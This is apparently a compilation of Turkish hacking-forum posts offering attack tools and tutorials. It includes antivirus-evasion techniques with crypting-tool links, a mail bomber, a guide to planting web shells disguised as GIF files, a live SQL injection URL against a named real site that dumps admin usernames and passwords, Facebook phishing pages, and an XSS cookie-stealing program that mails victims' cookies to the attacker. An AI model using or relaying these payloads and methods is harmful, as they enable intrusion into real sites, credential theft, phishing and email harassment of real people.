Dr.Web = Hex,
Ewido = Hex,
F-Prot = UPX, Hex, SignatureZero
G DATA = Xor, Hex
IkarusT3 = Xor, Hex
Kaspersky = Xor, Hex, SignatureZero
McAfee = Xor, Hex, SignatureZero
Malware = Xor, Hex, SigantureZero
NOD32 = Xor, Hex, SignatureZero
Norman = Hex, SignatüreZero
Panda = Hex, Xor
QuickHeal = Xor, Hex, SignatureZero
Solo Antivirus = Xor, Hex, SignatureZero
Sophos = Xor, Hex
TrendMicro = Xor, Hex
VBA32 = Xor, SignatureZero, Hex
VirusBuster = Xor, Hex, SignatureZero


Bunlarda gerekli araçlar;

OllyOllyDbg v1.10:
http://www.4shared.com/file/92314869/cc290aa4/OllyDbg_1101_DSR.html


HexWorkShop v6.0.1;
http://www.gazup.com/uQsh2-hex_workshop_v6.0.1.exe-download-mirrors

SignatureZero;
http://www.4shared.com/file/150819124/13dc92cc/SignatureZero.html

LordPE 1.41 Deluxe B;
http://www.4shared.com/file/150819036/e50ba896/LordPE_141_Deluxe_B.html

Toplu Mail Bomber %100 Inbox

Sa.
Bu Konumda Sizlerle Kendi Kodladığım Bir Mail Bomber’ı Paylaşacağım.
Program Gayet Hızlıdır Ve Aynı Anda 3 Mail Adresine Birden Saldırabiliyor.

Görünümü:















Kodlarken Çok Zorlandım Umarım Emeğimi Boşuna Çıkarmazsınız...

Download:
Buraya Tıkla
 

Shell Nasıl Atılır Videolu

Selamun Aleyküm Arkadaşlar,
Daha Önce Bir Çok Konumda Videolu ve Yazılı Olarak Shell’den Bahsettim, Bu Konular Sayesinde Shell’in İşlevi Hakkında Bilgilere Sahip Oldunuz. Bu Konumda İse Sizlere Shell’in Nasıl Atılacağı Hakkında Çeşitli Bilgiler Verecem.
Şimdi Herzamanki Dökümanlarım Gibi Madde Madde İlerleyelim.
Ana Başlıklarımız.
1) GIF89;a Shell Nasıl Yapılır.2) Upload Yöntemiyle Shell Atma.3) RFI Yöntemiyle Shell Atma.
4) SQL Injection İle Shell Atma.
5) XSS İle Shell Atma.6) XSRF İle Shell Atma
7) Exploits İle Shell Atma.8) Sosyal Mühendislik İle Shell Atma.
9) Sistem Zaafiyetleri İle Shell Atma.

Arkadaşlar Daha Bir Çok Yol ve Yöntem var Ancak Temel Olarak Yukarıdaki Maddeler Kullanılmaktadır. Bizde Bu Maddeler Üzerinden Öğreneceğiz. Gerisi Sizin Yetenek ve Becerilerinizle Gelişecek.
Şu Anda Hazırladığım Başlıkları Alt Alta Veriyorum, Eksik Olanları İse Zaman Buldukca Videolu ve Resimli Analtımlarıyla Ekleyeceğim.
1) GIF89;a Shell Nasıl Yapılır.
Resimli Anlatımı İndirmek İçin Tıklayın
Videolu Anlatımı İndirmek İçin Tıklayın
Şifre : EL_MuHaMMeD
Açıklama:
Arkadaşlar Soru Cevap Kısmına Bununla İlgili Çok Sayıda Konu Açıkldı, Bu Yüzden Detaylıca Anlatalım.
Öncelikle Shell.php Dosyasını Bir Txt Editörüyle Açıyoruz.
Karşınıza Shell Kodları Gelir, Kodların En Üstüne GIF89;a Kodunu Yerleştirip Kapatıyoruz.
Shell.php Dosyasının İsminide, Shell.gif.php Olarak Değiştirdiğimizde Shell’imiz Hazır Duruma Geliyor.
Böylelikle php, asp, aspx Gibi Shelleri Kabul Etmeyen Scriptlere Shell’imizi Bir Resim Dosyasıymış Gibi Okutup Sisteme Giriyoruz.
Girdiğimiz Sistemde, Daha Önceki Döküman ve Videolarımda Gösterdiğim ve Anlattığım Kurallar Geçerlidir.
2) Upload Yöntemiyle Shell Atma.
Resimli Anlatımı İndirmek İçin TıklayınBR

Videolu Anlatımı İndirmek İçin Tıklayın
Şifre : EL_MuHaMMeD
Açıklama:
Testing Site : http://127.0.0.1/elmuhammed/upload.html (localhost)
Herhangi Bir Arama Metoduyla Google’dan Bulduğumuz Bir Upload Sitesine, Nasıl Upload Yaparak Shell Atarız Resimli ve Videolu Olarak Anlattım.
Videoyu ve Resimleri LocalHostta Kendi Kodladığım Bir Upload Scriptinde Gösterdim, Sebebi Netim Yok :( Yinede Anlamadığınız Bir Kısmı Olursa Sorun.
Madde 3 Yapım Aşamasında :)
4) SQL Injection İle Shell Atma.
Resimli Anlatımı İndirmek İçin Tıklayın
Videolu Anlatımı İndirmek İçin Tıklayın
Şifre : EL_MuHaMMeD
Açıklama:
Testing Site : http://www.listed.nu/news.php?id=-32+union+select+1,concat%28username,0x3a,password%29,3,4,5+from+members/*
Arkadaşlar Test Sitemizde SQL Injection Açığı Mevcut, Açığı Kullanarak Admin Kullanıcı Adını ve Şifresini Alıyoruz.

Daha Sonra Admin Paneli Buluyoruz, ve Elimizdeki Bilgiler İle Login Oluyoruz.
Video ve Resimli Anlatımda da Göreceğiniz Gibi Shell Upload Edeceğimiz Bir Yer Bulup. Shell’imizi Yüklüyoruz.

Daha Sonra Serverdeyiz...
5,6,7,8 ve 9. Maddelerin Hazırlıkları Yapılmaktadır. Malumunuz İnternet Cafeden Girdikce Sizlere Yazılı, Resimli ve Videolu Anlatımlar Yapmaya Çalışıyorum. Hakkınızı Helal Edin.

Mail Sistemleri Hack || Facebook Uygulama

Dün hazırlamış olduğum bir facebook uygulaması. Yorumlarınızı yazarsanız çok sevinirim
Sistem Formmail İle Çalışır. Günümüz Fakelerinin En Gelişmiş Versiyonuda Budur Sanırım :)

Şuan 2 Dilde Tr ve İng. Genel İş Gören 2 Si Olduğu İçin Bu Dilde Sadece

Türkçesi || İngilizcesi

Tamamen Kendi Üretimimdir


Buda 1 önceki uygulamam..

Hesap Doğrulama

Şuan En Çok Hit Gören Bu Üçü. Bunların Dışında Dahada Var. Beğenilirse Paylaşabilirim...

JSky Web Scanner+Sql Injector

JSky Web Vulnerability Scanner Ve Eklentisi olan Pangolin
Sql,xss,lfi,admin panel gibi açıkları bulur. Sql bulduğunda Tablo,kolon ve dataları çeker. Videoda mysql,mssql,access örnek vardır. Access de ise wordliste göre tarama yapar.
Aslında o bir tarayıcı değil. Başlı başına bir exploit ;)
Video+link
Alternatif

Bazı AV’lar tehdit olarak görebilir. Program temizdir.

Hack Oyun Similatörü


http://rapidshare.com/files/403050961/Hacker_Evolution_upload_by_darKniqhts.rar.html

Geleceğin Mail Hack Yöntemi [Resimli]

Sa.

Yine Bir İlk İle Karşınızdayım :) Xss’yi Bilmiyeniniz Yoktur Ama Xss’yi Kullanacak Bir Sitede Yok :) Ama Ben Sizin İçin Bir Cookie Casusu Programı Yaptım. Program Kurbanın Cookie Bilgilerini Size Mail Olarak Atar.

Şimdi "Cookie Nedir ?" Diye Sorular Gelecek Onlar İçin Cevabım:

Cookie Ziyaret Ettiğiniz Sitelerdeki Tanılama Bilgileridir. Kullanıcılar Çoğu Zaman Parolamı Hatırla Ve Bunun Gibi Seçenekleri Seçtikleri Zaman Giriş Yapma Bilgileri Cookie Yani Çerez Olarak Kaydedilir. İşte Cookie Buna Denir...



Kullanımını Aşağıda Resimli Anlattım Zaten:



Anlatım:




Adım 2:




















Bu Adımda Casusu Oluşturduktan Sonra Tabiki Casusunuzu Kurbana Atıyorsunuz... :)


http://www.box.net/shared/8o2mi94hyk




RAR Şifresi: FEDERIKO
S.A Arkadaşlar.
Öncelikle BackDoor arkadaşıma videolar için teşekkür ederim.
Kendi kodlamış oldugum programda BackDoor arkadaşımızın videolarını daha derlitoplu bir hale getirdim. Biraz acemi oldu ama ben genede bi paylaşayım. Toplam 17 ders mevcuttur.

Part1: http://www.indirdur.net/files/1KPAZ8OY/Cyber_Warrior_Egitim.part01.rar

Part2:

http://www.indirdur.net/files/K0LC2APN/Cyber_Warrior_Egitim.part02.rar



Egitim Setinden Bir Görünüm: